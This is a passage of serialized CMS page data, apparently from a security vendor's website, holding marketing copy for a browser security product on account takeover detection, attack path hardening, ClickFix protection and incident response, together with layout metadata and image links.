detection",[353914],{"@type":353618,"property":353619,"operator":353620,"value":353915},"/uc/account-takeover-detection",{"title":353912,"customFonts":353917,"jsCode":37,"seoTitle":353912,"seoDescription":353922,"fontAwesomeIcon":353923,"tsCode":37,"blocks":353924,"url":353915,"state":354016},[353918],{"kind":353627,"category":353649,"variants":353919,"menu":353650,"files":353920,"family":353626,"subsets":353921,"version":353628,"lastModified":353629},[353655,353656,353657,353658,353659,353660,128,353661,353662,353663,353664,353665,1646,353666,353667,353668,353669,353670],{"100":353631,"200":353632,"300":353633,"500":353634,"600":353635,"700":353636,"800":353637,"900":353638,"300italic":353647,"500italic":353646,"800italic":353639,"700italic":353641,"italic":353643,"900italic":353640,"600italic":353648,"200italic":353645,"regular":353644,"100italic":353642},[353652,353653],"Stop ATO with stolen credential and compromised token detection.","faUserSecret",[353925,354011],{"@type":106,"@version":107,"tagName":353676,"id":353926,"meta":353927,"children":353928},"builder-e7913a774cae44c5a23d6081c5c30a52",{"previousId":353677},[353929,353945,353952,353959,353968,353978,353988,353998,354005],{"@type":106,"@version":107,"id":353930,"meta":353931,"component":353932,"responsiveStyles":353943},"builder-f1f1ab1601bc4c0f8c2a8aafd173675d",{"previousId":353681},{"name":353680,"options":353933,"isRSC":118},{"title":353912,"description":353934,"points":353935,"video":353942},"\u003Cp>Attackers don’t need to phish, they just need a password that works. Push monitors for signs of credential-based attacks in real time, directly in the browser, catching account takeover attempts before the damage spreads. From ghost logins to credential stuffing, Push cuts off the paths attackers use to quietly slip in the back door.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[353936,353938,353940],{"item":353937},"Identify credential-based ATO as it unfolds",{"item":353939},"Surface hijacked sessions and token misuse",{"item":353941},"Strengthen authentication where your IdP can’t","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb4dd9db24bc9495b8a686b1b4d492016%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=b4dd9db24bc9495b8a686b1b4d492016&alt=media&optimized=true",{"large":353944},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353695},{"@type":106,"@version":107,"id":353946,"meta":353947,"component":353948,"responsiveStyles":353950},"builder-0bc0d1c78ece4994993c3a6427a4d533",{"previousId":353697},{"name":353699,"options":353949,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":353951},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353703},{"@type":106,"@version":107,"id":353953,"meta":353954,"component":353955,"responsiveStyles":353957},"builder-e45de8f3768c4f16938dbf78e4e87524",{"previousId":353705},{"name":353707,"options":353956,"isRSC":118},{"darkMode":41},{"large":353958},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":353960,"component":353961,"responsiveStyles":353966},"builder-c98e8bfd341146c1b67c02d5698ff093",{"name":353712,"tag":353712,"options":353962,"isRSC":118},{"darkMode":6,"maxWidth":11942,"maxTextWidth":273005,"title":353963,"description":353964,"image":353965,"reverse":6},"\u003Ch2>Assume less. See more.\u003C/h2>","\u003Cp>Most account takeovers don’t start with a breach, they start with a login. Whether it’s a reused password, a local account, or an outdated login flow, Push shows you how accounts are actually accessed day to day, not just how policies say they should be. That means no more blind spots around ghost logins, bypassed SSO, or stale access paths that quietly persist.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F18630ad2746d4eb7b7fcc0428b11a8f0",{"large":353967},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":353969,"meta":353970,"component":353971,"responsiveStyles":353976},"builder-55c1fc38ddc04fd1a0d6a8e2fb819e00",{"previousId":353722},{"name":353724,"options":353972,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353726,"title":353973,"description":353974,"reverse":41,"image":353975},"\u003Ch2>Catch stolen credential use in real time\u003C/h2>","\u003Cp>Push monitors login activity directly in the browser to detect signs of credential-based attacks like leaked password use or suspicious login flows. By analyzing attacker TTPs instead of relying on known indicators, Push spots credential stuffing and account takeover attempts the moment they begin, not after they’ve succeeded.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F52b0123cac2c4dfdb1dc0af6adf9d603",{"large":353977},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":353732,"paddingTop":353734,"marginTop":353734},{"@type":106,"@version":107,"id":353979,"meta":353980,"component":353981,"responsiveStyles":353986},"builder-dfb31737b30948c6b95323655d571a50",{"previousId":353736},{"name":353724,"options":353982,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353739,"title":353983,"description":353984,"reverse":6,"image":353985},"\u003Ch2>Detect session hijacks and stealth access\u003C/h2>","\u003Cp>Attackers don’t always need a login screen, they often sidestep it entirely using stolen session tokens. Push detects when valid sessions are reused in unexpected ways, identifying hijacked sessions and stealth access attempts that traditional tools miss. Because we monitor directly in the browser, you see what’s happening inside active sessions in real time.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F94a6859a99e04d309ffe5841f3dbdf5c",{"large":353987},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353745},{"@type":106,"@version":107,"layerName":353724,"id":353989,"meta":353990,"component":353991,"responsiveStyles":353996},"builder-f7585b90eb974d03a7dc7eae5b58d227",{"previousId":353747},{"name":353724,"options":353992,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":280234,"title":353993,"description":353994,"reverse":41,"image":353995},"\u003Ch2>Harden accounts before they’re compromised\u003C/h2>","\u003Cp>Push goes beyond alerts. It identifies apps that still allow local logins, even when SSO is configured, so you can remove weak access paths. Push also flags users without MFA, reused work credentials, or weak passwords, and prompts users in-browser to fix risky behaviors before they’re exploited.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F01c1b638f1b6497093a4f2b8ceddb5bb",{"large":353997},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353755},{"@type":106,"@version":107,"id":353999,"meta":354000,"component":354001,"responsiveStyles":354003},"builder-ad81d1e3afec49a791214194eae09bdc",{"previousId":353757},{"name":353707,"options":354002,"isRSC":118},{"darkMode":6},{"large":354004},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354006,"component":354007,"responsiveStyles":354009},"builder-8dac1aa4b9d148628d92252bd8eff822",{"name":353765,"tag":353765,"options":354008,"isRSC":118},{"sectionHeading":37,"customClass":353767},{"large":354010},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":354012,"@type":106,"tagName":131,"properties":354013,"responsiveStyles":354014},"builder-pixel-bp9ni6h4vze",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":354015},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":354017},{"path":37,"query":354018},{},{},1770892814499,1745499162732,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F58b660fa94aa4b30b0faeb9b663ae41a","SfUPqW5tkibIPby49keNFMdHFTr1",[],{"lastPreviewUrl":354026,"hasLinks":6,"originalContentId":353613,"breakpoints":354027,"winningTest":118,"kind":353787,"hasAutosaves":41},"https://pushsecurity.com/uc/account-takeover-detection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=94bebb7bb99d48629ad157e80cf4d81d&builder.overrides.94bebb7bb99d48629ad157e80cf4d81d=94bebb7bb99d48629ad157e80cf4d81d&builder.overrides.use-case-page:/uc/account-takeover-detection=94bebb7bb99d48629ad157e80cf4d81d&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":354029,"id":354030,"name":354031,"modelId":353615,"published":13,"query":354032,"data":354035,"variations":354138,"lastUpdated":354139,"firstPublished":354140,"testRatio":33,"screenshot":354141,"createdBy":34,"lastUpdatedBy":354023,"folders":354142,"meta":354143,"rev":353789},1745009370904,"23eb48fb56d3451cab77cb6ed140ee6d","Attack path hardening",[354033],{"@type":353618,"property":353619,"operator":353620,"value":354034},"/uc/attack-path-hardening",{"tsCode":37,"seoDescription":354036,"jsCode":37,"customFonts":354037,"fontAwesomeIcon":354042,"seoTitle":354031,"title":354031,"blocks":354043,"url":354034,"state":354135},"Harden access paths with visibility,  detection, and guardrails.",[354038],{"kind":353627,"files":354039,"version":353628,"lastModified":353629,"subsets":354040,"menu":353650,"category":353649,"variants":354041,"family":353626},{"100":353631,"200":353632,"300":353633,"500":353634,"600":353635,"700":353636,"800":353637,"900":353638,"regular":353644,"italic":353643,"800italic":353639,"500italic":353646,"600italic":353648,"200italic":353645,"900italic":353640,"700italic":353641,"100italic":353642,"300italic":353647},[353652,353653],[353655,353656,353657,353658,353659,353660,128,353661,353662,353663,353664,353665,1646,353666,353667,353668,353669,353670],"faRadar",[354044,354130],{"@type":106,"@version":107,"tagName":353676,"id":354045,"meta":354046,"children":354047},"builder-1d8553eddcaa44d7bba9e2f4ca13af2a",{"previousId":353926},[354048,354064,354071,354078,354087,354097,354107,354117,354124],{"@type":106,"@version":107,"id":354049,"meta":354050,"component":354051,"responsiveStyles":354062},"builder-84fe3d7c85a743cf8cef649aa974f1ef",{"previousId":353930},{"name":353680,"options":354052,"isRSC":118},{"title":354031,"description":354053,"points":354054,"video":354061},"\u003Cp>Push continuously monitors your environment for exposed login paths, weak credentials, and missing protections like MFA. It detects the gaps attackers exploit and helps you close them before they’re used.\u003C/p>",[354055,354057,354059],{"item":354056},"Find weak spots like reused passwords, local logins, and missing MFA",{"item":354058},"Monitor how users actually log in across apps, flows, and tools",{"item":354060},"Enforce secure access with in-browser guardrails","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fdbdcf52892034f1bbddded77f753a343%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=dbdcf52892034f1bbddded77f753a343&alt=media&optimized=true",{"large":354063},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353695},{"@type":106,"@version":107,"id":354065,"meta":354066,"component":354067,"responsiveStyles":354069},"builder-b3f66f5b08054cc78a06fecfc3ae2337",{"previousId":353946},{"name":353699,"options":354068,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":354070},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353703},{"@type":106,"@version":107,"id":354072,"meta":354073,"component":354074,"responsiveStyles":354076},"builder-4c73418b84be49ed85e6e13d2625c5a0",{"previousId":353953},{"name":353707,"options":354075,"isRSC":118},{"darkMode":41},{"large":354077},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354079,"component":354080,"responsiveStyles":354085},"builder-dec0246085e1485c803f7152b1922a81",{"name":353712,"tag":353712,"options":354081,"isRSC":118},{"darkMode":6,"maxWidth":11942,"maxTextWidth":273005,"title":354082,"description":354083,"image":354084,"reverse":6},"\u003Ch2>Find the gaps that lead to compromise\u003C/h2>","\u003Cp>Misconfigurations don’t show up in your config files, they show up in how users actually access apps. Push monitors real login behavior in the browser, surfacing risky patterns like local login access, duplicate accounts, or missing protections that leave doors wide open.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F309a59bba8d247a19476bb369397460e",{"large":354086},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354088,"meta":354089,"component":354090,"responsiveStyles":354095},"builder-ebf049a645604a249550996a88f8f3b6",{"previousId":353969},{"name":353724,"options":354091,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353726,"title":354092,"description":354093,"reverse":41,"image":354094},"\u003Ch2>See real login behavior\u003C/h2>","\u003Cp>Push watches authentication flows as they happen, giving you a live view of how users log in, which methods they choose, and where protections like MFA are missing. Plus, uncover every app and account in use, even shadow IT you didn’t know existed, without relying on stale config files or IdP assumptions. \u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb51f6b0357cc451b87a7a5016d984e5e",{"large":354096},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":353732,"paddingTop":353733,"marginTop":353734},{"@type":106,"@version":107,"id":354098,"meta":354099,"component":354100,"responsiveStyles":354105},"builder-431d175c59004669b0b2776b07d71737",{"previousId":353979},{"name":353724,"options":354101,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353739,"title":354102,"description":354103,"reverse":6,"image":354104},"\u003Ch2>Find and fix posture drift\u003C/h2>","\u003Cp>Security posture isn’t static. Push continuously monitors for issues like missing MFA or legacy login methods. When something falls out of policy, you know immediately with custom notifications so you can act before it turns into risk.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F324e39127dfc41e592b1183dfb39892d",{"large":354106},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353745},{"@type":106,"@version":107,"layerName":353724,"id":354108,"meta":354109,"component":354110,"responsiveStyles":354115},"builder-3dffdcbe0a484e2ca4c03f019b6d40ee",{"previousId":353989},{"name":353724,"options":354111,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":280234,"title":354112,"description":354113,"reverse":41,"image":354114},"\u003Ch2>Guide users with in-browser guardrails\u003C/h2>","\u003Cp>Push doesn’t just surface problems, it helps you fix them. When users sign in without MFA, reuse a password, or use insecure credentials, Push prompts them directly in the browser to secure their access. It’s faster, more effective, and actually gets results.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fee8b75d13e45488aba55434a8b49ebb0",{"large":354116},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353755},{"@type":106,"@version":107,"id":354118,"meta":354119,"component":354120,"responsiveStyles":354122},"builder-976bc222cd7647ff905f1e01cfedc453",{"previousId":353999},{"name":353707,"options":354121,"isRSC":118},{"darkMode":6},{"large":354123},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354125,"component":354126,"responsiveStyles":354128},"builder-8c47ec2fd0f74382bb3e6c870555632c",{"name":353765,"tag":353765,"options":354127,"isRSC":118},{"sectionHeading":37,"customClass":353767},{"large":354129},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":354131,"@type":106,"tagName":131,"properties":354132,"responsiveStyles":354133},"builder-pixel-hqgadf1h59w",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":354134},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":354136},{"path":37,"query":354137},{},{},1770892844854,1745499166112,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6ca12bf728a045f1a31d40c0beb3bfe5",[],{"kind":353787,"lastPreviewUrl":354144,"breakpoints":354145,"hasLinks":6,"originalContentId":353911,"winningTest":118,"hasAutosaves":6},"https://pushsecurity.com/uc/attack-path-hardening?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=23eb48fb56d3451cab77cb6ed140ee6d&builder.overrides.23eb48fb56d3451cab77cb6ed140ee6d=23eb48fb56d3451cab77cb6ed140ee6d&builder.overrides.use-case-page:/uc/attack-path-hardening=23eb48fb56d3451cab77cb6ed140ee6d&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":354147,"id":354148,"name":354149,"modelId":353615,"published":13,"query":354150,"data":354153,"variations":354258,"lastUpdated":354259,"firstPublished":354260,"testRatio":33,"screenshot":354261,"createdBy":34,"lastUpdatedBy":354023,"folders":354262,"meta":354263,"rev":353789},1761675020232,"ea4f309d2ffe46c5aa97ebf0fda4e2e3","ClickFix Protection",[354151],{"@type":353618,"property":353619,"operator":353620,"value":354152},"/uc/clickfix-protection",{"seoDescription":354154,"fontAwesomeIcon":354155,"customFonts":354156,"seoTitle":354161,"jsCode":37,"tsCode":37,"title":354161,"blocks":354162,"url":354152,"state":354255},"Block attacks that trick users into running malicious code.","faLaptopCode",[354157],{"files":354158,"subsets":354159,"menu":353650,"version":353628,"kind":353627,"family":353626,"lastModified":353629,"variants":354160,"category":353649},{"100":353631,"200":353632,"300":353633,"500":353634,"600":353635,"700":353636,"800":353637,"900":353638,"200italic":353645,"800italic":353639,"700italic":353641,"600italic":353648,"100italic":353642,"italic":353643,"regular":353644,"300italic":353647,"500italic":353646,"900italic":353640},[353652,353653],[353655,353656,353657,353658,353659,353660,128,353661,353662,353663,353664,353665,1646,353666,353667,353668,353669,353670],"ClickFix protection",[354163,354250],{"@type":106,"@version":107,"tagName":353676,"id":354164,"meta":354165,"children":354166},"builder-d7eefdde0f2a4b2b9de3dcb2978fd6cb",{"previousId":354045},[354167,354183,354190,354197,354207,354217,354227,354237,354244],{"@type":106,"@version":107,"id":354168,"meta":354169,"component":354170,"responsiveStyles":354181},"builder-56e2c54bcce040a4af8b92ae03706c12",{"previousId":354049},{"name":353680,"options":354171,"isRSC":118},{"title":354161,"description":354172,"points":354173,"image":354180},"\u003Cp>ClickFix attacks are one of the fastest-growing threats, tricking users into copying malicious code from a webpage and running it locally. This technique bypasses traditional EDR, email gateways, and network filters, leading directly to ransomware and data theft. Push stops this attack at the source, in the browser, by detecting and blocking the malicious behavior before the user can ever paste the code.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[354174,354176,354178],{"item":354175},"Detect ClickFix, FileFix, and fake CAPTCHA in the browser",{"item":354177},"Block malicious copy-and-paste actions before code is executed",{"item":354179},"See full telemetry into which users were targeted and what they saw","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b74af62889847ebb3927364485b0546",{"large":354182},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353695},{"@type":106,"@version":107,"id":354184,"meta":354185,"component":354186,"responsiveStyles":354188},"builder-05f9614d4e3e4dc88b3ee8658f54e10e",{"previousId":354065},{"name":353699,"options":354187,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":354189},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353703},{"@type":106,"@version":107,"id":354191,"meta":354192,"component":354193,"responsiveStyles":354195},"builder-c4fb5179366243c1b6c32d368675cf47",{"previousId":354072},{"name":353707,"options":354194,"isRSC":118},{"darkMode":41},{"large":354196},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354198,"meta":354199,"component":354200,"responsiveStyles":354205},"builder-261af50705fd445d8cca4a6ba20d5391",{"previousId":354079},{"name":353712,"tag":353712,"options":354201,"isRSC":118},{"darkMode":6,"maxWidth":11942,"maxTextWidth":273005,"title":354202,"description":354203,"reverse":6,"image":354204},"\u003Ch2>Stop ClickFix-style attacks before they become a breach\u003C/h2>","\u003Cp>Traditional security tools are blind to malicious copy and paste attacks because the attack exploits a gap between the browser and the endpoint. EDR only sees the payload after it runs, and network tools see only part of the picture.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F98b2f7e08dec4eafaf8e24937605b8cf",{"large":354206},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354208,"meta":354209,"component":354210,"responsiveStyles":354215},"builder-7d21b8aab8064c40b1e5dd23c4749309",{"previousId":354088},{"name":353724,"options":354211,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353726,"title":354212,"description":354213,"reverse":41,"image":354214},"\u003Ch2>Discover lures at the source\u003C/h2>","\u003Cp>Push inspects page behavior to identify ClickFix attacks as they happen. By inspecting the page, its structure, and how the user interacts with it, Push can detect and block these in-browser threats in real time. This deep, TTP-based inspection spots the trap even on novel pages that are built to bypass traditional web filters and blocklists.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F665bf47e01544c75bf9ddafd3917927b",{"large":354216},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":353732,"paddingTop":353733,"marginTop":353734},{"@type":106,"@version":107,"id":354218,"meta":354219,"component":354220,"responsiveStyles":354225},"builder-fb91943adf6149259ed9e1e6566c9afe",{"previousId":354098},{"name":353724,"options":354221,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353739,"title":354222,"description":354223,"reverse":6,"image":354224},"\u003Ch2>Block the malicious action\u003C/h2>","\u003Cp>When Push detects a malicious script, it intercepts the user's action and blocks the code from being copied to the clipboard. The user is protected, the attack is stopped, and no malicious code ever reaches the endpoint. Unlike broad DLP tools, this action is surgical, targeting only malicious behavior without disrupting normal work.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F5ee68f81f1ac416685cbfe91298cf827",{"large":354226},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353745},{"@type":106,"@version":107,"layerName":353724,"id":354228,"meta":354229,"component":354230,"responsiveStyles":354235},"builder-bfac95fada864e5a8259b955b5b5f98b",{"previousId":354108},{"name":353724,"options":354231,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":280234,"title":354232,"description":354233,"reverse":41,"image":354234},"\u003Ch2>Accelerate ClickFix investigations\u003C/h2>","\u003Cp>When an attack happens, knowing what the user saw or did is critical. Push provides rich browser session data for rapid investigation and containment. Security teams get detailed telemetry on which users were targeted, what lure they were served, and when the block occurred. This enables defenders to reconstruct what happened and respond quickly, even when other tools miss the activity entirely.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6cdf2a8aeddc4e9a9023cbf974e40239",{"large":354236},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353755},{"@type":106,"@version":107,"id":354238,"meta":354239,"component":354240,"responsiveStyles":354242},"builder-136892e831684a6987f87d3be67c33d1",{"previousId":354118},{"name":353707,"options":354241,"isRSC":118},{"darkMode":6},{"large":354243},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354245,"component":354246,"responsiveStyles":354248},"builder-dec26b739f2f42beb5a73cfc6c675b60",{"name":353765,"tag":353765,"options":354247,"isRSC":118},{"sectionHeading":37,"customClass":353767},{"large":354249},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":354251,"@type":106,"tagName":131,"properties":354252,"responsiveStyles":354253},"builder-pixel-jb7i4u6v2mk",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":354254},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":354256},{"path":37,"query":354257},{},{},1770892881888,1761847585203,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F375467b8bef34ed1a8a1cc5b8b67d75f",[],{"lastPreviewUrl":354264,"originalContentId":354030,"winningTest":118,"hasLinks":6,"kind":353787,"breakpoints":354265,"hasAutosaves":6},"https://pushsecurity.com/uc/clickfix-protection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.overrides.ea4f309d2ffe46c5aa97ebf0fda4e2e3=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.overrides.use-case-page:/uc/clickfix-protection=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":354267,"id":354268,"name":354269,"modelId":353615,"published":13,"query":354270,"data":354273,"variations":354378,"lastUpdated":354379,"firstPublished":354380,"testRatio":33,"screenshot":354381,"createdBy":34,"lastUpdatedBy":354023,"folders":354382,"meta":354383,"rev":353789},1745009743870,"a9d5556e77f84a37b5bd52310a7110c1","Incident response",[354271],{"@type":353618,"property":353619,"operator":353620,"value":354272},"/uc/incident-response",{"seoDescription":354274,"customFonts":354275,"title":354269,"jsCode":37,"fontAwesomeIcon":354280,"seoTitle":354281,"tsCode":37,"blocks":354282,"url":354272,"state":354375},"Investigate and respond faster with unique browser telemetry.",[354276],{"kind":353627,"subsets":354277,"menu":353650,"variants":354278,"category":353649,"family":353626,"version":353628,"lastModified":353629,"files":354279},[353652,353653],[353655,353656,353657,353658,353659,353660,128,353661,353662,353663,353664,353665,1646,353666,353667,353668,353669,353670],{"100":353631,"200":353632,"300":353633,"500":353634,"600":353635,"700":353636,"800":353637,"900":353638,"900italic":353640,"600italic":353648,"200italic":353645,"300italic":353647,"100italic":353642,"700italic":353641,"800italic":353639,"regular":353644,"italic":353643,"500italic":353646},"faSatelliteDish","Browser based incident response",[354283,354370],{"@type":106,"@version":107,"tagName":353676,"id":354284,"meta":354285,"children":354286},"builder-653c4aed737b4def88dc4cd2d695660a",{"previousId":354045},[354287,354304,354311,354318,354327,354337,354347,354357,354364],{"@type":106,"@version":107,"id":354288,"meta":354289,"component":354290,"responsiveStyles":354302},"builder-18190bd36518467d9154d27d7e945b9b",{"previousId":354049},{"name":353680,"options":354291,"isRSC":118},{"title":354292,"description":354293,"points":354294,"video":354301},"Browser-based incident response","\u003Cp>Push gives you real-time visibility into what actually happened during a breach, right in the browser where the attack played out. From credential theft to session hijacking, Push captures high-fidelity telemetry so you can investigate quickly, contain confidently, and shut it down before it spreads.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[354295,354297,354299],{"item":354296},"Reconstruct what happened with real browser session context",{"item":354298},"Investigate faster with real-world session context",{"item":354300},"Trigger response actions automatically through your SIEM or SOAR","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd00e39d3b6e346c296261d875cf55652%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=d00e39d3b6e346c296261d875cf55652&alt=media&optimized=true",{"large":354303},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353695},{"@type":106,"@version":107,"id":354305,"meta":354306,"component":354307,"responsiveStyles":354309},"builder-8a0a8ea63f5d48dd8a6726f2d49cf0ca",{"previousId":354065},{"name":353699,"options":354308,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":354310},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353703},{"@type":106,"@version":107,"id":354312,"meta":354313,"component":354314,"responsiveStyles":354316},"builder-2df65c3f54334df2b26e7cb744886cdc",{"previousId":354072},{"name":353707,"options":354315,"isRSC":118},{"darkMode":41},{"large":354317},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354319,"component":354320,"responsiveStyles":354325},"builder-2c32c869efc2423ab69ef06b150e9f97",{"name":353712,"tag":353712,"options":354321,"isRSC":118},{"darkMode":6,"maxWidth":11942,"maxTextWidth":273005,"title":354322,"description":354323,"